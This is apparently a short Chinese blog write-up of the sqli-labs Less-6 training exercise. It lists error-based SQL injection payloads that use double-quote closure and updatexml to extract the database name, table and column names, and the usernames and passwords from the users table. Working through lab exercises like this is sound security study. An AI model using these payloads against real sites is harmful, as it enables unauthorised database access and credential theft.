判断闭合
双引号
没有回显,用报错注入。
这题和less5大致一样只是将闭合改了。
所以我就只附个码了
?id=1\
?id=1" order by 3--+
?id=1" and updatexml(1,concat(0x7e,database()),3) -- a
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31)),3) -- a
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),3) -- a
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31)),3) -- a
标签:--,0x7e,substr,updatexml,less6,id,concat From: https://www.cnblogs.com/xiaoxie11/p/17426381.html